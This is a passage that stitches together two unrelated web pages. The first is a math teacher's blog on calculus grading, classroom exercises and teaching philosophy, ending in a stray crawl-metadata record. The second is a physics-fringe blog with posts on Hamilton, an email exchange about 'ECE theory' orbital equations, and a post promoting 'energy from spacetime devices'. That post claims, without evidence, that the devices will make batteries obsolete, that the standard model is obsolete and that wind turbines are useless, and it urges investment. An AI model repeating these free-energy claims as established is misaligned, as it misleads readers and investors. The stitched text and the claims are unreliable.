exercise that will be used in class. I collected seven standards into the Gateway Exam, which will form the bulk of the third midterm. I split the remaining standards into 45 “tasks”, which is a term I hope will be clearer than “standards”; each standard split into approximately two tasks. The idea of tasks goes back in my mind to the list of problems Kate Owens shared from her Ph.D. advisor George McNulty. That is, a task is a specific type of problem that students will show they know how to solve. Here is the new introduction to the “Goals and Assessment” section of my syllabus:\n\nChange is present all around us, and understanding it is an essential component of many fields of study. Calculus is fundamentally a set of tools for measuring, quantifying, estimating, and interpreting change in a variety of contexts. In this course, we will delve into some of the most profound ideas in mathematics, whose roots are from ancient times and which began to develop fully in the 17th century; they continue to form the basis for much of modern science. My hope is that this class will develop your analytical ability and deepen your appreciation for the power and elegance of mathematics.\n\nThe skills you should acquire are related to the Learning Outcomes stated on the first page of this syllabus. Your mastery of the course content will be assessed through your performance on a collection of definite tasks. A complete list of tasks is on the last two pages of this syllabus. These tasks, rather than points or percentages, will be the primary basis for grading. The following sections provide details on how the tasks will be assessed and what you should accomplish in order to earn your final grade.\n\nMy hope is that this method of assessment, called standards-based grading or mastery grading, will keep you clearly informed as to the expectations of the class and how well you are meeting them, while also removing the (often distracting) elements of linear grading that uses letters or total points. Learning is not always a straightforward process, and one of my goals is to give you as many opportunities as possible to demonstrate your understanding. I will be glad to do everything I can to help you towards your goal of mastery. 
If you have questions or concerns at any time, please feel free to discuss them with me.\n\nAnother potential source of confusion from my SBG system in the past was the levels of ranking. I really liked that we were using the vocabulary of mastery / proficiency / basic ability / novice to talk about students’ progress, but it was rare that a student could rate their own work with one of these levels. So this fall I opted, as many others have, for a simple pass/fail approach on tasks. I don’t like the pass/fail language, however, so I chose successful for a task completed satisfactorily and progressing or incomplete for work that has major mistakes or is absent. I also wanted to handle small mistakes through a faster revision process, an idea I picked up from MathFest; for these situations, I added a revisions needed category. Here is how I describe the rating system in my syllabus:\n\nA task is a problem or a collection of similar problems that should be solved using calculus tools. Your progress in the class will be measured in terms of the number of tasks that you accomplish. Partial credit is not given; a task must be fully successful in order to count towards your final grade. Whenever a task is included on an exam, your work will receive one of four ratings:\nSsuccessful Solution is complete and correct.\nRminor revisions needed Solution is correct except for small errors.\nPprogressing Partial understanding is evident, but solution contains substantial errors.\nIincomplete Not enough evidence is available to provide an assessment.\nA task marked “S” has been completed; you can check it off the list at the end of the syllabus.\nA task marked “R” can have a small mistake such as an arithmetic error or a miscopied value. You will have 48 hours (or over the weekend if the work is returned on a Friday) to complete a Revision Form that explains how to correct the mistakes, and to submit the form along with your original work, in order to earn a successful rating.\nA task marked “P” demonstrates progress in mastering the topic, but reassessment is necessary in order to successfully accomplish the task.\nA task marked “I” shows little or no relevant work. Reassessment is necessary.\nTo show mastery of a task after it has received a rating of P or I, see the section entitled “Reassessment” on the next page.\nHopefully this simplified rating system will also make it easier for me to track student progress over the duration of the semester and analyze trends afterwards. (I agree with Kate that Drew’s “A tale of two students” chart was a moment of clear inspiration at MathFest.)\n\nIn order to help students know what is expected to prepare for reassessment, and to help me schedule them more effectively, I have introduced Reassessment Tickets:\n\nAfter a task has been assessed on an exam, you may schedule a reassessment if you did not successfully complete the task. This is a two-step process:\n• First, pick up a Reassessment Ticket from my door or download and print one from the Courses site. Complete the form and return it to me at least 24 hours before you want a reassessment.\n• Second, once a meeting is scheduled, come to my office and I will give you a new opportunity to demonstrate mastery of the task. If possible, I will grade your work immediately; otherwise, I will let you know the result by the following day.\nI will reassess up to two tasks per student per week. 
In addition, you can use exam days as opportunities for reassessment of up to three tasks, provided you let me know 48 hours in advance which ones.\nI plan to use one or two class days at the end of the semester for reassessment alongside review, as well.\n\nAnother element I introduced was subcategories of tasks: “core”, “modeling”, and “additional“ (not a great name, I’ll try to find a better one in the future). Again, lots of other people are already doing this, and I like what many of them are doing, which is to require two demonstrations of mastery for core skills and only one for the rest. I couldn’t figure out how to make that work with my system, so I made the following distinction: core tasks are the ones that could appear on the final exam. There are 14 of them, and I will choose seven to go on the final. (The final exam will also include a reflection essay, and a period of time for additional reassessment.) I also set higher expectations for how many core vs. additional tasks needed to be successful at each grade level.\n\nWhat I learned from creating a list of tasks is that, because I state exactly what types of questions I will include on the tests, there is less wiggle room than with standards, which could always be applied to new sorts of problems. (This is the distinction between activity and ability I talked about in my last post.) I don’t know if my list of tasks, or the categorizing thereof, is ideal, but it is certainly enough to guarantee that a student who succeeds at all of them will have mastered calculus 1. (I used Robert’s classification of “core” and “supplemental” learning targets as a reference while I was sorting, but our lists don’t match up exactly.)\n\nAfter all the work that goes into getting away from letter grades in a standards-based system, it’s always a bit dispiriting to turn back to them. So I start my section on “Final letter grades” with a bit of reluctance (not to say snark).\n\nAt the end of the semester, I am required to submit to the university a letter grade reflecting your achievement in this class. Here is how that grade will be determined.\n\nTo earn an A: in addition to passing the Gateway Exam and completing the Final Reflection,\n• Submit 20 homework reports.\n• Complete all modeling tasks.\n• Complete all core tasks.\n• Complete 6 core tasks on the final exam (minor errors are acceptable).\nTo earn an B: in addition to passing the Gateway Exam and completing the Final Reflection,\n• Submit 15 homework reports.\n• Complete 2 modeling tasks.\n• Complete 12 core tasks.\n• Complete 5 core tasks on the final exam (minor errors are acceptable).\nPassing the Gateway Exam is required to earn a final grade of B– or higher.\n\nTo earn an C: in addition to completing the Final Reflection,\n• Submit 10 homework reports.\n• Complete 1 modeling task.\n• Complete 10 core tasks.\n• Complete 17 additional tasks OR pass the Gateway Exam and complete 14 additional tasks.\n• Complete 4 core tasks on the final exam (minor errors are acceptable).\nFailure to complete a Final Reflection will result in a grade of D or F.\n\nTo earn a D:\n• Submit 5 homework reports.\n• Complete any 30 tasks from C.1–C.14, A.1–A.28, M.1–M.3 OR pass the Gateway Exam and complete any 23 tasks.\n• Complete 3 core tasks on the final exam (minor errors are acceptable).\nPlusses and minuses will be assigned as follows: if all criteria for a letter grade are met as well as two or three of those for a higher letter grade, then a plus will be added. 
If all but one or two criteria for a letter grade are met, and the remaining items meet the criterion for one letter grade lower, then the higher letter will be given with a minus added.\n\nI will use my discretion to assign a final letter grade in cases where a different set of conditions is met.\n\nSo there it is. My syllabus for calculus this semester. I’m sure by December, or even October, I’ll have a much better notion of what changes I should have made. I’ll let you know how it goes.\n\n(I should also have given more attribution in this post to the people I stole ideas from, especially at MathFest, but I don’t have those notes on hand right now. So a general word of thanks goes out to this very sharing community.)\n\nSunday, September 02, 2018\n\nprologue to a syllabus\n\n(This was originally supposed to be the post in which I describe my syllabus for the fall. I started writing some preliminary comments, and they got out of control. I’ll get back to the syllabus itself in my next post.)\n\nFirst, I must express some gratitude. Thanks to parental leave provided by the state of California and my school, I did not have any teaching duties last spring. It was my first time not teaching first-semester calculus in four years. As I tell my students, calculus 1 is actually one of my favorite classes to teach, but I could tell by last fall that some parts of the course were getting stale. Having a semester break meant that, in addition to getting to know my newborn daughter, I could let my ideas on how to improve calculus instruction and assessment simmer for a bit.\n\nActually, it’s not entirely honest to refer to “my ideas” in this setting; what I really needed was a chance to reflect on ideas I’d been picking up (stealing) from others, and even better, to acquire (steal) some fresh ideas, which a workshop and conference provided over the summer. A fabulous community of college and university math teachers has formed around the question of how to improve our assessment practices, and the rate at which sharing/stealing/developing ideas is remarkably fast.\n\nOver the past few weeks, as the fall semester has started up, several people have shared their syllabi along with extensive, thoughtful commentary on how they created them. I’ve been holding back, however, because while I believe my syllabus is better than it was last year, by the time the semester started I only felt like I had gotten it to “just good enough.” Some ideas aren’t fully developed yet, some feel out of balance, and some are plain risky. Nevertheless, in the spirit of community and maintaining a growth mindset, I’ve decided to go ahead and share my syllabus, too, warts and all.\n\nSince I see this as a long-term work in progress, I’d like to begin with a few words about that progress. (These comments will parallel somewhat my talk from MathFest last month.) I started using standards-based grading in spring 2013, largely as a way to improve the feedback I was giving students. After a reasonably successful first attempt, I began using alternative assessment methods in all of my classes. 
Some worked better than others, but because I was teaching calculus 1 so often, my SBG system for that class developed into a collection of 25–30 standards that became fairly stable.\n\nAround the same time, Robert Talbert was blogging about specifications grading, a well-developed and flexible framework whose goals, in the words Linda Nilson uses to subtitle her book on the topic, are “restoring rigor, motivating students, and saving faculty time.” For a while I remained skeptical about specs grading, because I couldn’t understand why anyone would turn to something besides my beloved standards. Eventually, however, I realized that SBG as I conceived it didn’t work in every situation, and so I delved more into specs. The Google+ community initiated by Robert goes by the name SBSG, to include both standards-based and specifications grading. Today the language of the community encompasses these and other alternative assessment systems under the broader term mastery grading, which hearkens back to Bloom’s terminology of mastery learning.\n\nAt MathFest, I talked a bit about this history of my classes and did some compare-and-contrast between SBG and specs grading. Possibly the most useful contribution I made to that session was the following six-word summary of how they relate:\n\nStandards emphasize content.\nSpecifications emphasize activity.\nHere’s another way to phrase the distinction in my mind: When we create standards, we are answering the question what do we want students to be able to do? When we create specifications, we are answering the question what do we want students to have done? More bluntly, standards are what we want to measure, while specifications are what we can actually measure; the latter is a proxy for the former.\n\nI guess my claim is that standards and specifications support each other: they are two sides of the same coin. We need specifications in order to determine how standards will be assessed, and a clear list of standards keeps specifications from becoming arbitrary. (Or as Drew Lewis said on Twitter, “specs are how I assign letter grades, with the primary spec being mastery of standards.”) Whether I say that an assessment system is based on specifications or standards depends on whether the description of the system focuses on the proxy or the thing for which it proxies.\n\nBy last fall, some cracks in my SBG system for calculus had started to show. Every semester, I had a couple of students at the end of the course who still thought it wasn’t clear. The homogeneity of the list of standards was mushing the most important concepts together with secondary ones. Worst of all from a practical standpoint, I was finally getting overwhelmed by reassessments after years of claiming that SBG didn’t take any more of my time than traditional grading. I knew I needed to make some changes to clarify and streamline the assessment process.\n\nWhat I have for now isn’t perfect, but it will get me through the semester. With this lengthy prologue complete, in my next post I’ll share parts of my syllabus and explain what I hope it achieves.\n\nMonday, August 27, 2018\n\n“Create Your Own” part 1\n\nToday was the first day of calculus for the fall semester of 2018. 
As a first-day activity, I wanted to do something that didn’t require any calculus knowledge and could break students out of the mindset that doing math is always about solving particular problems that have been fed to you.\n\nSo I initiated a sequence of exercises I’m planning, which I’ve come to think of collectively as “Create Your Own…”. In this case, I gave the following prompt:\n\nThe number 1 can be written many different ways, for example 4 – 3 or 10/10.\nCome up with ten different expressions that equal 1. Be creative!\nTry to have at least four of your solutions involve some kind of algebraic expression, like a variable x.\nAfter they had a few minutes to work individually, I had them share their answers in small groups, and each group picked out what expression by its members they thought was most creative. At the end of class, I collected all of their solutions to look at later in the day.\n\nIn having students do this exercise, I learned a lot, and I would definitely do it again, with a few tweaks. Here’s some of what I learned:\n\n• Students judge creativity differently than I do. In looking over the collective work this evening, I saw some excellent examples of splitting 1 into a sum of fractions or decimals and some elaborate expressions involving absolute values or square roots. But the groups often picked examples with the fanciest functions as most creative. Each section had some students come up with cos2(x)+sin2(x) as an answer, and some used logarithms, as in ln(e) or log10(10). And I’m glad those functions were there! It gave us a chance to talk a little about them and for me to give assurance that we would review them at an appropriate time. But 1/10+2/5+1/2 is much more personal, somehow, and I’d like it to have its due.\n• This kind of exercise was surprising and unfamiliar. I’m not quite sure how much time I gave for the creative process; I started out in my head with the idea of 2–3 minutes, but that clearly wasn’t enough, so it was probably 4–5. In that time, not everyone came up with ten solutions. (Which is fine! We’d spent an earlier part of the class watching Jo Boaler’s “Four Key Messages” video, which emphasizes that speed isn’t essential in learning math; a couple of students added that comment to their work.) I saw a few get stuck for a while, however, and next time I’ll have some ideas for how to gently prod.\n• The notion of “variable” is very strongly connected with “solving an equation”. The vast majority of students interpreted the direction “involve some kind of algebraic expression” to mean “write an equation whose solution is 1.” This led to answers like 2x=2 and x+3=4, and many others (one group gave log5(x)=0 as an answer!). There was a remarkable amount of creativity in the creation of these equations; I’d like to figure out how to leverage that. But now I also know that the distinction between an “expression” and an “equation” has not yet been made clear, and when we start simplifying algebraic expressions (e.g., to compute limits), we’ll still need to inject some flexibility into our thinking.\nThe main adjustments I would make next time are:\n• Rephrasing the instructions to say that the expressions simplify to 1, rather than equalling 1. Hopefully this will give clearer direction regarding algebraic expressions. 
Also, I would probably add an algebraic example like (x+1)–x.\n• Preparing, nonetheless, for a discussion about what the term “expression” means.\n• Giving a more definite and slightly longer period of time, and providing more useful interventions as the students do individual work.\n\nThat’s all for now. More updates as warranted.\n\nMonday, August 20, 2018\n\ndialectics in mathematics\n\nThis post is part of the Virtual Conference on Mathematical Flavors, and is part of a group thinking about different cultures within mathematics, and how those relate to teaching. Our group draws its initial inspiration from writing by mathematicians that describe different camps and cultures — from problem solvers and theorists, musicians and artists, explorers, alchemists and wrestlers, to “makers of patterns”. Are each of these cultures represented in the math curriculum? Do different teachers emphasize different aspects of mathematics? Are all of these ways of thinking about math useful when thinking about teaching, or are some of them harmful? These are the sorts of questions our group is asking. (intro by Michael Pershan)\n\nI want to talk about how we respond to polarities. Here I mean “polarity” in the philosophical sense (a pair of concepts that are apparently in conflict) rather than in a mathematical sense. When we encounter a struggle or tension between goals or ideas, we tend to create one of two things:\n\n• dichotomy — a conclusion that the two ideas are irreconcilable and the choosing of sides, or\n• synthesis — a selection of desirable features from each and the attempt to make those features coexist.\nWhile each approach is at times appropriate, both have their downsides. Establishing a dichotomy means that one side tends to be silenced and its contributions lost. Creating a synthesis can mean that neither side is fully honored; everything is compromise.\n\nI propose a third option, an alternative to dichotomy or synthesis: this approach is dialectic — upholding both sides fully, maintaining the two ideas in tension so that a conversation may arise between them. Etymologically, “dialectic” comes from the roots “dia” (“across”) and “logos” (“word” or “reason”), so its underlying meaning may be read as “speaking across a divide”. Dialectics can simply refer to discussion or debate between two opposing sides, but I use it to denote a state that seeks not resolution, but rather the fruitfulness of an irreducible struggle. Doing so acknowledges the worth, validity, and potency of both sides. It can therefore be used in the classroom to foster the inclusion of diverse perspectives, even in mathematics.\n\nOur group’s discussion began with an essay by Timothy Gowers entitled “The Two Cultures of Mathematics”. In this piece, Gowers makes the claim that most mathematicians are either “problem solvers”, who prefer to attack specific open problems that they believe are important, or “theory builders”, who prefer to develop a large, coherent body of understanding. The former are interested in general theory mainly insofar as it provides ways to solve their problems; the latter are interested in specific problems mainly insofar as they spur deeper insights or new directions for theory.\n\nThis subdivision is similar to the pure/applied separation we often talk about in mathematics, though it is not quite the same thing. Even the problems Gowers mentions fall well within the “pure” category. 
But these two polarities (pure/applied, theory/problems) share the feature that adherents of one side tends to be a bit snobbish towards those of the other.\n\nPure mathematicians tend to look on applied mathematics as, at best, a dirty form of math or, at worst, not truly math at all. G. H. Hardy, in his famous essay A Mathematician’s Apology, describes pure mathematics as more enduring, more exciting, and more “real” than applied mathematics. (He does make clear that what he considers “applied” mathematics limits itself to “elementary” tools, which more-or-less means grade-school arithmetic up through introductory calculus, and so his notion of applied mathematics might no longer suffice. I’ll get back to Hardy shortly.)\n\nGowers claims that, in a similar way, theory-building is currently “more fashionable” than problem-solving in the math world. (Rather than drawing the analogy with pure and applied mathematics, however, he compares this snobbishness with one, observed by C. P. Snow in “The Two Cultures”, held by humanities toward the sciences.) He laments that “this is not an entirely healthy state of affairs” and spends most of his essay defending problem-solving areas of math (combinatorics, in particular) against some perceived criticisms. His argument suggests to me that both the theory-building and the problem-solving camps should be upheld without one attempting to overcome the other; that is, a healthier state can be reached by sustaining a dialectic.\n\nHow can we think about theory-building vs. problem-solving in our classes?\n\nFor one thing, many of our students are trained problem-solvers. For them, learning mathematics means developing an appropriate response to any given stimulus. If a problem statement includes this-or-that word or phrase, then I should use such-and-such a technique to find a solution. For many of us instructors, however, it is the abstraction of ideas that drew us to mathematics. What is possible in this situation? To what extent can the possibilities be quantified and categorized? If theory-building is currently en vogue in mathematical culture, then I suspect we who teach are not immune to that trend. But here comes the question of motivation: what will draw students into doing mathematics? In many cases, the answer is… a problem. The problem may be “applied” (e.g., how does a population grow over time) or “pure” (e.g., how does the size of a square increase when its side length increases?), but a concrete connection provides an open door to considering broader mathematical truths. Such problems can lead into developing theory (e.g., what properties do exponential and polynomial functions share, and what distinguishes them?).\n\nBut developing theory for its own sake has been a part of mathematics since at least Euclid; we do our students a disservice if we neglect this aspect of doing math. A theory crystallizes into a single lattice ideas that might otherwise have been perceived as disconnected. Algebra in particular provides a unifying framework for solving individual problems. On the other hand, non-constructive statements are by turns inspiring and infuriating. It is no small movement from the (typically algebraic) claim that “A solution exists! And you can find it by following these steps…\" to the (typically analytic) claim that “A solution exists! 
And you may never find it exactly…” This theory in turn motivates a slew of new problems: if nothing else, how shall we find solutions as close to the true answer as we desire?\n\nIn any case, it is useful to abide by a constructivist view of knowledge: students will understand best the structures that they form in their own minds, whether by induction (problem-solving) or deduction (theory-building), and they should be presented with ample opportunities for both forms of construction.\n\n[Side note: in his keynote post for this series, Michael describes an occasion where he side-steps, or deconstructs, the theory-building/problem-solving divide by encouraging math-doers to create their own questions based on a simple prompt, questions which could easily veer in any direction, including problem-solving or theory-building.]\n\nIt is not hard to find other places in mathematics where polarities exist and a choice must be made: dichotomy, synthesis, or dialectic? A few weeks ago, I made a bit of a fuss on Twitter, claiming that everything Hardy wrote about mathematical culture should be read skeptically. The context for my criticism was an oft-shared quote from “A Mathematician’s Apology”: “Beauty is the first test: there is no permanent place in the world for ugly mathematics.”\n\nA question immediately presents itself: who decides what is beautiful? Any claim to objectivity is nearly always tied up with privilege. The answer cannot be “all mathematicians” because we all have such different tastes and preferences. Nor can the answer be “a special subset of mathematicians” because the choice of that subset will inevitably be determined by power structures within the mathematical community. But neither is the answer that all mathematics is equally beautiful. The standard of beauty may be subjective, but that does not mean it is arbitrary. We value beauty, but it is not the sole or even the primary standard by which we judge mathematics.\n\nHardy argues that all mathematics considered “useful” is essentially “dull” or “trivial”. He seeks to create a dichotomy between the beautiful and the practical. Perhaps he didn’t foresee the computing revolution. He couldn’t predict that number theory would be used in encryption, or that general relativity would be used for GPS, or that differential equations would be used for movie animations. Perhaps he would not consider these applications to be built on the deepest, truest parts of those theories. (To be fair, at the time he wrote, Hardy was distressed by the ways in which science had been used in the cause of warfare, and wanted to establish some distance between pure mathematics and that particular set of applications.)\n\nFrom an evangelistic perspective, potential converts (our students in particular) may be drawn in from either side: the aesthetic or the practical. I personally was first attracted to geometric form and the lovely, counterintuitive properties of mathematical relations. Some of my students have tastes similar to mine, but many more will be convinced of the predictive power of mathematics before they accept its inherent attractiveness.\n\nBeyond this, however, neither beauty nor usefulness can or should be subjugated to the other. Mathematics is grounded in both. They can hone each other, but they can also proceed independently. Progress flows from the pursuit of either. 
It would be a mistake, I believe, to claim that either is the true purpose of mathematics; we should support both of them in our minds and in our classrooms.\n\nNot every tension needs to be handled this way, but examples of dialectical pairings abound: precision and approximation, confidence and confusion, individual and community. I encourage us all to consider times when it can be productive not to resolve such conflicts but instead to foster a breadth of understanding from them.\n\nFriday, August 10, 2018\n\nsummer activities\n\nThis summer I had a fair amount of travel and conference/workshop activities. I’ve also been working on several projects that need finishing, and of course I have an eight-month old daughter. So I haven’t been blogging, even though several ideas for posts have been kicking around in my head. In order to get something posted, here’s a summary of some major events of the summer.\n\nIn May I taught a four-week session of “Transition to Abstract Mathematics”, our introduction-to-proofs course. I had seven students who worked very hard throughout the session. I was pleased that we were able to reach a point where the students could present results they selected from Proofs from THE BOOK during the final exam period.\n\nIn June I attended a program on “Teichmüller dynamics, mapping class groups and applications” at the Institut Fourier in Grenoble. (If any of those topics are of interest to you, videos of all the talks are available on YouTube.) I did not give a lecture, but I had a chance to talk with several people about work I did last summer with a Pepperdine student on the topic of “homothety” or “dilation” surfaces. Got a couple of more projects started during this time, to mix into the three or four I was already working on. ¯\\_(ツ)_/¯ It was also my first time visiting that part of France, so I traveled with family around the region. A couple of touristic highlights: tasting Chartreuse at the distillery in Voiron, and exploring the Citadel in Sisteron.\n\nIn July I participated in an IBL workshop run by the Academy of Inquiry-Based Learning. Four days with 25 enthusiastic teacher-learners and six fantastic facilitators. I started a set of IBL notes to use in the course on complex variables I’m teaching next spring and garnered several new tools and ideas for increasing student activity and engagement in the classroom.\n\nLast weekend I joined the mastery grading session at MathFest. Tons more ideas here! It’s great to be part of so many communities of people who are generating and sharing ideas big and small.\n\nI’ve promised to write at least one more blog post in the next week, for Sam Shah’s Virtual Conference on Mathematical Flavors. So it won’t be quite so long before I post again!" ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.88302803,"math_prob":0.9612865,"size":11191,"snap":"2019-43-2019-47","text_gpt3_token_len":3249,"char_repetition_ratio":0.1418611,"word_repetition_ratio":0.023424428,"special_character_ratio":0.30113485,"punctuation_ratio":0.121811785,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.98071027,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2019-10-19T15:31:40Z\",\"WARC-Record-ID\":\"<urn:uuid:3bca2fc6-fd1c-4223-9f37-09e793277fae>\",\"Content-Length\":\"150972\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:4c1b95ad-4e23-48ab-889c-632834fce25e>\",\"WARC-Concurrent-To\":\"<urn:uuid:b7948c00-862c-4ad7-900e-80bf5ee9fbe1>\",\"WARC-IP-Address\":\"172.217.12.225\",\"WARC-Target-URI\":\"https://thalestriangles.blogspot.com/\",\"WARC-Payload-Digest\":\"sha1:6WR35MR5CRRTJP52WN5YI5WYCQM6YRU5\",\"WARC-Block-Digest\":\"sha1:FST46EENRRI5HXEHUWT7ERUXBU6LZO7E\",\"WARC-Identified-Payload-Type\":\"application/xhtml+xml\",\"warc_filename\":\"/cc_download/warc_2019/CC-MAIN-2019-43/CC-MAIN-2019-43_segments_1570986696339.42_warc_CC-MAIN-20191019141654-20191019165154-00488.warc.gz\"}"}
http://aias.us/blog/index3df6.html?m=201703
[ "## Archive for March, 2017\n\n### My Civil List Predecessor Rowan Hamilton\n\nFriday, March 31st, 2017\n\nSir William Rowan Hamilton is known as Rowan Hamilton in Trinity College Dublin, of which I am sometime Visiting Academic. He was appointed to the Civil List on April 27th 1844 with a pension of £200 a year (about £22,319 a year today). My Civil List Pension is £2,400 a year, so it has been eroded a lot in value since 1844. It is now an honorarium rather than a salary to live on. The Civil List Pension is akin to Order of Merit. Hamilton was appointed Professor of Astronomy in Dublin at the age of twenty two and was considered to be one of the best mathematicians in the world at the age of 18. His papers “On a General Method of Dynamics” (1834 and 1835) gave the Hamilton Principle of Least Action and also what are known now as the Euler Lagrange equations. These were actually discovered by Hamilton using the Euler principle of 1744 and using some of Lagrange’s ideas of 1760. He also inferred the Hamilton or canonical equations, defined the lagrangian and inferred the hamiltonian, the basis of quantum mechanics. In UFT176, (www.aias.us and www.upitec.org) the Quantum Hamilton Equations are inferred, in what has become a classic paper. The Hamilton Principle of Least Action can be used in many branches of physics and mathematics.\n\n### Computations of 374(2) and 374(3): Precession Confirmed\n\nFriday, March 31st, 2017\n\nThis is an important remark, precession is still present. These will be very interesting as usual, there are many possible advances that can be made by using the equations of fluid dynamics in orbital theory: the continuity equation (conservation of matter); Navier Stokes equation; conservation of energy equation and vorticity equation. All of these add new equations to the set of simultaneous differential equations. I will write new notes on this theme.\n\nTo: [email protected]\nSent: 31/03/2017 08:35:03 GMT Daylight Time\nSubj: Re: Discussion of 374(2)\n\nMany thanks for these clarifications, I fully agree that fluid dynamic effects must be handled like a potential (i.e. as given properties) for the Lagrange mechanism. Using the correct momentum (28) will not give qualitative changes in the numerical solution because I used a constant spin connection, only the numbers will change.\nEqs. 43-44 c an be solved for any assumed radial function R_r(r). Eq. 45 does not enter the calculation, it would be interesting to see if the angular momentum is really conserved for non-constant functions R_r.\n\nHorst\n\nAm 29.03.2017 um 10:42 schrieb EMyrone:\n\nThese are interesting comments. This note is based entirely on standard equations of the Lagrange and Hamilton dynamics applied to vectors, notably Eq. (3), which gives the correct momentum p from the Lagrangian (2), these are all contained in Marion and Thornton. The vector Euler Lagrange equation is Eq. (11), and leads correctly to the well known equations (20) and (21), the Leibniz equation and the equation of constraint (21). The kinetic energy is p dot p / (2m). The primary purpose of the note is to show that the correct momentum must be defined by p bold = partial lagrangian / partial r dot bold (see for example Marion and Thornton). Eqs. (22) – (24) work correctly for classical dynamics, but no longer work correctly for fluid dynamics. The correct momentum of fluid dynamics must be calculated from eq. (3) using the lagrangian (35). The correct momentum is p bold = m v bold, where v bold is given by Eq. (26). 
This is the same as the momentum used in UFT363, and leads to Eqs. (33) and (34). The spin connection partial R sub r / partial r must be regarded in the same way as the potential energy U(r). Neither is a Lagrange variable. The key point is that the momentum p bold can be obtained correctly from the lagrangian (2) if and only if Eq. (3) is used. This is checked from the fact that p bold is r bold dot in Eq.(2). Then use the rules of differentiation with r dot bold. For classical dynamics, Eqns (22) to (24) happen to work fortuitously, and these are of course the equations used by Marion and Thornton in their chapter seven. However, for fluid dynamics they no longer work, because the complete momentum is now:\n\np bold = x r dot e sub r bold + r theta dot e sub theta bold\n\nwhere\nx = (1 + partial R sub r / partial r)\n\nUsing this in Eqs. (2) and (3) gives the correct momentum from the correct lagrangian, containing the correct kinetic energy. The correct momentum is Eq. (28) multiplied by m. When used in Eq. (29) it leads to to Eqs. (33) and (34). Eq. (33) is different from that found in UFT363, because in UFT363, the correct factor x in Eq. (33) turned out to be x squared, as in Eq. (39) of this note. Therefore the lagrangian (35) cannot be used with Eq. (38). This result is by no means obvious. It shows that there is a certain amount of subjectivity in the Lagrange method as is well known. It is by no means obvious how to choose the Lagrange variables, and the choice of lagrangian is also subjective to some degree. These things emerge in for example quantum field theory. Fortunately the answer is simple, use Eq. (13), in which there is only one Lagrange variable, vector r bold. This leads to Eqs. (33) and (34). I suggest putting Eqs. (43) to (45) through Maxima to see how the orbital precession behaves. I do not think that the replacement of x sqaured of UFT363 by the correct x of this note will make any qualitative difference to the precession that you have already inferred numerically. It might affect the details of the precession, but the precession will remain.\n\nTo: EMyrone\nSent: 28/03/2017 14:40:47 GMT Daylight Time\nSubj: Re: 374(2): Complete Analysis of UFT363\n\nIt is difficult for me to understand this note for principal reasons. My interpretation is the following:\n\nThe Lagrangian method is based on the kinetic energy and generalized coordinates. The Euler-Lagrange equations are based on the kinetic energy of the generalized coordinates. These coordinates are found by coordinate transformations. In our case the radial coordinate is transformed by\n\nr –> r + R_r(r)\n\nwhere R_r(r) is a “distortion” of radial motion of a particle inferred by fluid dynamics. For the Lagrange mechanism this function has to be known a priori, it cannot result from the Euler-Lagrange equations. If we assume that the R_r function is to be determined dynamically by the dynamics, we need an additional equation of motion or state or whatever. In Lagrange theory, energy conservation is fulfilled. This is not necessarily the case if a “free floating” function is introduced. I guess that you had this in mind when saying that a Hamiltonian formulation is needed in addition to the Lagrangian formulation to determined the dynamics consistently.\n\nSo the question is where to take the conditions for R_r that must appear as a constraint in the Lagrange mechanism. The generalized coordinates should be r and theta, but what is the kinetic energy? 
Let’s assmume that the velocity, eqs.(26,27) of the note, is that derived from the coordinate transformation. Then the Euler-Lagrange equations (33,34) are correct, although they contain an unspecified function R_r (which is not time dependent).\n\nI do not understand the part of the note after eqs.(33,34). Why do you introduce the Lagrangian (35)? Obviously this belongs to a different problem to be solved. And why should it be re-expressed to (36)? The momentum in Lagrange theory is a generalized momentum and needs not have the form (37).\n\nOn page 6 of the manuscript I cannot decipher the sentence “It is not possible to choose … as Lagrange varibles”. Which variables do you mean?\nEqs. (44) and (45) are derived from the same Euler-Lagrange equation and are not independent. It is true that (45) is a constant of motion but this is not suited for solving the equations because it is only of first order. What about using\n\nH = 1/2 m v^2 + U(r) = const.\n\ninstead? Then we can determine partial R_r/partial r , and replace it in (43,44) so that we have only derivatives of time and the equation system could be solved by Maxima for example. In general, combination of Lagrange theory (which is for mass points primarily) and fluid dynamics (which is for distributed fields) may be a bit tricky.\n\nSorry for having written such a long sermon today.\nHorst\n\nAm 28.03.2017 um 10:44 schrieb EMyrone:\n\nThis note shows that the complete Lagrangian and Hamiltonian formulations are needed to describe fluid dynamics self consistently. When this is done UFT363 is slighly corrected to Eqs. (43) to (45), which can be solved simultaneously using Maxima to give the orbit and spin connection.\n\n### Bosch Corporation Studying Energy from Spacetime Devices\n\nFriday, March 31st, 2017\n\nThis interest can be seen on the daily reports for today and yesterday. These can be based on the replicated and patented Osami Ide circuit (UFT311, UFT321 UFT364, Self Charging Inverter), which will bring in the second industrial revolution described by AIAS Fellow Dr. Steve Bannister in his Ph. D. Thesis on www.aias.us (Department of Economics, University of Utah). See also www.et3m.net and www.upitec.org. The Alex Hill company has recently signed a joint venture agreement with a company in the United States. I think that investment managers should be interested in this new industry. It should return a spectacular amount on investment. ECE theory describes the Osamu Ide circuit with precision (UFT311), whereas the obsolete standard model fails completely. See also the pulsed LENR report by AIAS Director Douglas Lindstrom on www.aias.us and his Idaho lecture. He is currently on a business trip to China, where there has been intense interest in ECE theory for some years. There are potentially huge new markets for spacetime devices all over the world. They could be used to power domestic appliances of the type manufactured by Bosch. They could also be made into power stations, large power plants, power devices for electric vehicles, power plants for ships and also aircraft and spacecraft, and should make the chemical battery industry obsolete. That is why Prof. Bannister describes them as powering the second industrial revolution. Wind turbines are already obsolete as well as completely useless. Governments should implement energy from spacetime devices as quickly as they can. 
